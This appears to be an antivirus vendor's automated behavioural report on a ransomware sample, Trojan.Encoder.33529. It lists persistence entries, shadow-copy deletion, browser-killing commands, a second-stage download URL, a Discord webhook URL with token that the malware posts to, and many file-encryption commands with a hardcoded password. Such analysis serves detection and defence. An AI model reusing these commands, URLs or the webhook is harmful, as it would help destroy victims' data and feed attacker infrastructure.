
Trojan.Encoder.33529

Added to the Dr.Web virus database: 2021-03-01

Virus description added:

Technical Information

To ensure autorun and distribution
Creates or modifies the following files
  • %APPDATA%\microsoft\windows\start menu\programs\startup\<File name>.exe
  • <SYSTEM32>\tasks\updatewuauclt
  • <SYSTEM32>\tasks\updatewuauclthelper
Malicious functions
To complicate detection of its presence in the operating system, blocks execution of the following system utilities:
  • Windows Task Manager (Taskmgr)
Deletes volume shadow copies.
Executes the following
  • '<SYSTEM32>\taskkill.exe' /f /im opera.exe
  • '<SYSTEM32>\taskkill.exe' /f /im chrome.exe
  • '<SYSTEM32>\taskkill.exe' /f /im firefox.exe
  • '<SYSTEM32>\taskkill.exe' /f /im iexplore.exe
Downloads files.
Downloads
  • https://cdn-35.anonfiles.com/9821w1g5p3/8a0b1f8a-1613613819/gameover.exe as %temp%\final.exe
Terminates or attempts to terminate the following user processes:
  • firefox.exe
  • iexplore.exe
Modifies file system
Creates the following files
  • %TEMP%\e35c.tmp\e35d.tmp\extd.exe
  • %HOMEPATH%\desktop\pay2decrypt22.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt23.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt24.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt25.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt26.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt27.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt28.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt29.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt3.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt30.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt20.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt21.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt31.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt34.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt35.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt36.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt37.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt38.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt39.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt4.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt40.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt41.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt42.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt32.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt33.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt44.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt43.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt18.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt51.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt94.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt93.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt92.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt91.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt90.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt9.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt89.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt88.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt19.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt95.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt2.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt87.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt10.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt100.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt11.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt12.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt13.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt14.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt15.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt16.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt17.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt86.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt85.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt1.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt50.txt
  • %HOMEPATH%\desktop\pay2decrypt45.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt73.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt75.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt76.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt77.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt78.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt79.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt8.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt80.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt81.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt82.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt72.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt83.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt74.txt.lck
  • %HOMEPATH%\desktop\pmd.cer.lck
  • %HOMEPATH%\desktop\telegram.lnk.lck
  • %HOMEPATH%\desktop\sdkfailsafeemulator.cer.lck
  • %HOMEPATH%\desktop\iisstart.htm.lck
  • %HOMEPATH%\desktop\iisstart.html.lck
  • %HOMEPATH%\desktop\testee.cer.lck
  • %HOMEPATH%\desktop\ituneshelpunavailable.htm.lck
  • %HOMEPATH%\desktop\icq.lnk.lck
  • %HOMEPATH%\desktop\advice_process.htm.lck
  • %HOMEPATH%\desktop\dialmap.bmp.lck
  • %HOMEPATH%\desktop\tree_view.html.lck
  • %HOMEPATH%\desktop\pay2decrypt71.txt.lck
  • %HOMEPATH%\desktop\sdksampleunprivdeveloper.cer.lck
  • %HOMEPATH%\desktop\pay2decrypt70.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt7.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt47.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt49.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt5.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt50.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt84.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt52.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt53.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt54.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt55.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt56.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt57.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt58.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt48.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt59.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt60.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt61.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt62.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt63.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt64.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt65.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt66.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt67.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt68.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt69.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt96.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt6.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt99.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt97.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt98.txt.lck
  • %HOMEPATH%\desktop\desktop.ini.lck
  • %HOMEPATH%\desktop\pay2decrypt26.txt
  • %HOMEPATH%\desktop\pay2decrypt27.txt
  • %HOMEPATH%\desktop\pay2decrypt28.txt
  • %HOMEPATH%\desktop\pay2decrypt29.txt
  • %HOMEPATH%\desktop\pay2decrypt30.txt
  • %HOMEPATH%\desktop\pay2decrypt31.txt
  • %HOMEPATH%\desktop\pay2decrypt32.txt
  • %HOMEPATH%\desktop\pay2decrypt33.txt
  • %HOMEPATH%\desktop\pay2decrypt34.txt
  • %HOMEPATH%\desktop\pay2decrypt23.txt
  • %HOMEPATH%\desktop\pay2decrypt21.txt
  • %HOMEPATH%\desktop\pay2decrypt25.txt
  • %HOMEPATH%\desktop\pay2decrypt35.txt
  • %HOMEPATH%\desktop\pay2decrypt39.txt
  • %HOMEPATH%\desktop\pay2decrypt40.txt
  • %HOMEPATH%\desktop\pay2decrypt41.txt
  • %HOMEPATH%\desktop\pay2decrypt42.txt
  • %HOMEPATH%\desktop\pay2decrypt43.txt
  • %HOMEPATH%\desktop\pay2decrypt44.txt
  • %HOMEPATH%\desktop\pay2decrypt45.txt
  • %HOMEPATH%\desktop\pay2decrypt46.txt
  • %HOMEPATH%\desktop\pay2decrypt47.txt
  • %HOMEPATH%\desktop\pay2decrypt36.txt
  • %HOMEPATH%\desktop\pay2decrypt37.txt
  • %HOMEPATH%\desktop\pay2decrypt38.txt
  • %HOMEPATH%\desktop\pay2decrypt22.txt
  • %HOMEPATH%\desktop\pay2decrypt20.txt
  • %HOMEPATH%\desktop\pay2decrypt48.txt
  • %TEMP%\e35c.tmp\aescrypt.exe
  • %TEMP%\e35c.tmp\discordsendwebhook.exe
  • nul
  • %TEMP%\kill.bat
  • %TEMP%\p2d.bat
  • %HOMEPATH%\desktop\pay2decrypt1.txt
  • %HOMEPATH%\desktop\pay2decrypt2.txt
  • %HOMEPATH%\desktop\pay2decrypt3.txt
  • %HOMEPATH%\desktop\pay2decrypt4.txt
  • %HOMEPATH%\desktop\pay2decrypt5.txt
  • %HOMEPATH%\desktop\pay2decrypt6.txt
  • %TEMP%\e35c.tmp\e35d.tmp\e35e.bat
  • %HOMEPATH%\desktop\pay2decrypt7.txt
  • %HOMEPATH%\desktop\pay2decrypt9.txt
  • %HOMEPATH%\desktop\pay2decrypt10.txt
  • %HOMEPATH%\desktop\pay2decrypt11.txt
  • %HOMEPATH%\desktop\pay2decrypt12.txt
  • %HOMEPATH%\desktop\pay2decrypt13.txt
  • %HOMEPATH%\desktop\pay2decrypt14.txt
  • %HOMEPATH%\desktop\pay2decrypt15.txt
  • %HOMEPATH%\desktop\pay2decrypt16.txt
  • %HOMEPATH%\desktop\pay2decrypt17.txt
  • %HOMEPATH%\desktop\pay2decrypt18.txt
  • %HOMEPATH%\desktop\pay2decrypt19.txt
  • %HOMEPATH%\desktop\pay2decrypt8.txt
  • %HOMEPATH%\desktop\alert.html.lck
  • %HOMEPATH%\desktop\pay2decrypt46.txt.lck
  • %HOMEPATH%\desktop\pay2decrypt49.txt
  • %HOMEPATH%\desktop\pay2decrypt53.txt
  • %HOMEPATH%\desktop\pay2decrypt83.txt
  • %HOMEPATH%\desktop\pay2decrypt84.txt
  • %HOMEPATH%\desktop\pay2decrypt85.txt
  • %HOMEPATH%\desktop\pay2decrypt86.txt
  • %HOMEPATH%\desktop\pay2decrypt87.txt
  • %HOMEPATH%\desktop\pay2decrypt88.txt
  • %HOMEPATH%\desktop\pay2decrypt89.txt
  • %HOMEPATH%\desktop\pay2decrypt90.txt
  • %HOMEPATH%\desktop\pay2decrypt91.txt
  • %HOMEPATH%\desktop\pay2decrypt80.txt
  • %HOMEPATH%\desktop\pay2decrypt92.txt
  • %HOMEPATH%\desktop\pay2decrypt82.txt
  • %HOMEPATH%\desktop\pay2decrypt94.txt
  • %HOMEPATH%\desktop\pay2decrypt96.txt
  • %HOMEPATH%\desktop\pay2decrypt97.txt
  • %HOMEPATH%\desktop\pay2decrypt98.txt
  • %HOMEPATH%\desktop\pay2decrypt99.txt
  • %HOMEPATH%\desktop\pay2decrypt100.txt
  • %WINDIR%\temp\cabad9d.tmp
  • %WINDIR%\temp\tarad9e.tmp
  • %TEMP%\final.exe
  • %TEMP%\e35c.tmp\e35d.tmp\e35f.tmp
  • %HOMEPATH%\desktop\pay2decrypt93.txt
  • %HOMEPATH%\desktop\pay2decrypt24.txt
  • %HOMEPATH%\desktop\pay2decrypt95.txt
  • %HOMEPATH%\desktop\pay2decrypt81.txt
  • %HOMEPATH%\desktop\pay2decrypt79.txt
  • %HOMEPATH%\desktop\pay2decrypt78.txt
  • %HOMEPATH%\desktop\pay2decrypt54.txt
  • %HOMEPATH%\desktop\pay2decrypt55.txt
  • %HOMEPATH%\desktop\pay2decrypt56.txt
  • %HOMEPATH%\desktop\pay2decrypt57.txt
  • %HOMEPATH%\desktop\pay2decrypt58.txt
  • %HOMEPATH%\desktop\pay2decrypt59.txt
  • %HOMEPATH%\desktop\pay2decrypt60.txt
  • %HOMEPATH%\desktop\pay2decrypt61.txt
  • %HOMEPATH%\desktop\pay2decrypt62.txt
  • %HOMEPATH%\desktop\pay2decrypt63.txt
  • %HOMEPATH%\desktop\pay2decrypt52.txt
  • %HOMEPATH%\desktop\pay2decrypt64.txt
  • %HOMEPATH%\desktop\pay2decrypt66.txt
  • %HOMEPATH%\desktop\pay2decrypt67.txt
  • %HOMEPATH%\desktop\pay2decrypt68.txt
  • %HOMEPATH%\desktop\pay2decrypt69.txt
  • %HOMEPATH%\desktop\pay2decrypt70.txt
  • %HOMEPATH%\desktop\pay2decrypt71.txt
  • %HOMEPATH%\desktop\pay2decrypt72.txt
  • %HOMEPATH%\desktop\pay2decrypt73.txt
  • %HOMEPATH%\desktop\pay2decrypt74.txt
  • %HOMEPATH%\desktop\pay2decrypt75.txt
  • %HOMEPATH%\desktop\pay2decrypt76.txt
  • %HOMEPATH%\desktop\pay2decrypt65.txt
  • %HOMEPATH%\desktop\pay2decrypt77.txt
  • %HOMEPATH%\desktop\pay2decrypt51.txt
  • %HOMEPATH%\desktop\dashborder_192.bmp.lck
Sets the 'hidden' attribute to the following files
  • <Full path to file>
  • %TEMP%\e35c.tmp\aescrypt.exe
  • %TEMP%\e35c.tmp\discordsendwebhook.exe
Deletes the following files
  • %WINDIR%\temp\cabad9d.tmp
  • %WINDIR%\temp\tarad9e.tmp
  • %TEMP%\e35c.tmp\e35d.tmp\e35f.tmp
Changes user data files extensions (Trojan.Encoder).
Network activity
Connects to
  • 'di##ord.com':443
  • 'cd####.anonfiles.com':443
  • 'microsoft.com':80
TCP
  • 'di##ord.com':443
  • 'cd####.anonfiles.com':443
  • 'an###iles.com':443
UDP
  • DNS ASK di##ord.com
  • DNS ASK cd####.anonfiles.com
  • DNS ASK microsoft.com
  • DNS ASK an###iles.com
  • DNS ASK st####.rapidssl.com
Miscellaneous
Searches for the following windows
  • ClassName: '' WindowName: ''
Creates and executes the following
  • '%TEMP%\e35c.tmp\discordsendwebhook.exe' -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dialmap.bmp.lck" "dialmap.bmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "alert.html.lck" "alert.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dashBorder_192.bmp.lck" "dashBorder_192.bmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "168.jpeg.lck" "168.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "howto-index.html.lck" "howto-index.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "210252809.jpeg.lck" "210252809.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "pushkin.jpeg.lck" "pushkin.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "february_catalogue__2015.doc.lck" "february_catalogue__2015.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt83.txt.lck" "Pay2Decrypt83.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "2.jpeg.lck" "2.jpeg"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "lisp_success.doc.lck" "lisp_success.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotnetfx45_full_setup.exe.lck" "dotnetfx45_full_setup.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "uep_form_786_bulletin_1726i602.doc.lck" "uep_form_786_bulletin_1726i602.doc"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "skypesetup.exe.lck" "skypesetup.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "wrar520.exe.lck" "wrar520.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "tcm851ax32.exe.lck" "tcm851ax32.exe"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.ini.lck" "ntuser.ini"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Mail.Ru.lck" "Mail.Ru"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "advice_process.htm.lck" "advice_process.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ICQ.lnk.lck" "ICQ.lnk"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iTunesHelpUnavailable.htm.lck" "iTunesHelpUnavailable.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "testEE.cer.lck" "testEE.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt75.txt.lck" "Pay2Decrypt75.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt76.txt.lck" "Pay2Decrypt76.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt77.txt.lck" "Pay2Decrypt77.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt78.txt.lck" "Pay2Decrypt78.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt79.txt.lck" "Pay2Decrypt79.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt8.txt.lck" "Pay2Decrypt8.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt80.txt.lck" "Pay2Decrypt80.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt81.txt.lck" "Pay2Decrypt81.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.pol.lck" "ntuser.pol"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "nwfieldnotes1966.docx.lck" "nwfieldnotes1966.docx"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt82.txt.lck" "Pay2Decrypt82.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "pmd.cer.lck" "pmd.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Total.lck" "Total"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "SDKSampleUnprivDeveloper.cer.lck" "SDKSampleUnprivDeveloper.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Telegram.lnk.lck" "Telegram.lnk"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "QIP.lck" "QIP"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "SDKFailsafeEmulator.cer.lck" "SDKFailsafeEmulator.cer"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iisstart.htm.lck" "iisstart.htm"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "iisstart.html.lck" "iisstart.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "Pay2Decrypt74.txt.lck" "Pay2Decrypt74.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "tree_view.html.lck" "tree_view.html"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "CVRF2A3.tmp.cvr.lck" "CVRF2A3.tmp.cvr"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGIE195.tmp.lck" "RGIE195.tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM...
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_NDP471-KB4033342-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP471-KB4033342-x86-x64-AllOS-ENU_decompression_log.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt.lck" "dd_NDP452-KB2901907-x86-x64-AllOS-ENU_decompression_log.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "AdobeSFX.log.lck" "AdobeSFX.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotNetFx.log.lck" "dotNetFx.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dotNetFxSDK.log.lck" "dotNetFxSDK.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20200611_031101_060.txt.lck" "dd_wcf_CA_smci_20200611_031101_060.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20151217_052908_497.txt.lck" "dd_wcf_CA_smci_20151217_052908_497.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00001.log.lck" "ASPNETSetup_00001.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00003.log.lck" "ASPNETSetup_00003.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00000.log.lck" "ASPNETSetup_00000.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20200611_031056_919.txt.lck" "dd_wcf_CA_smci_20200611_031056_919.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_wcf_CA_smci_20151217_052858_840.txt.lck" "dd_wcf_CA_smci_20151217_052858_840.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup_00002.log.lck" "ASPNETSetup_00002.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "dd_SetupUtility.txt.lck" "dd_SetupUtility.txt"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ASPNETSetup.log.lck" "ASPNETSetup.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGIE195.tmp-tmp.lck" "RGIE195.tmp-tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "RGI8564.tmp-tmp.lck" "RGI8564.tmp-tmp"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "p2d.bat.lck" "p2d.bat"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "AdobeARM_NotLocked.log.lck" "AdobeARM_NotLocked.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "wmsetup.log.lck" "wmsetup.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "MSIeb217.LOG.lck" "MSIeb217.LOG"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "JavaDeployReg.log.lck" "JavaDeployReg.log"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT.lck" "NTUSER.DAT"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.ini.lck.lck" "ntuser.ini.lck"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "ntuser.pol.lck.lck" "ntuser.pol.lck"
  • '%TEMP%\e35c.tmp\aescrypt.exe' -e -p 8Z2FHidHq5ZX1nUUpKUcuJvr026hZApH -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"
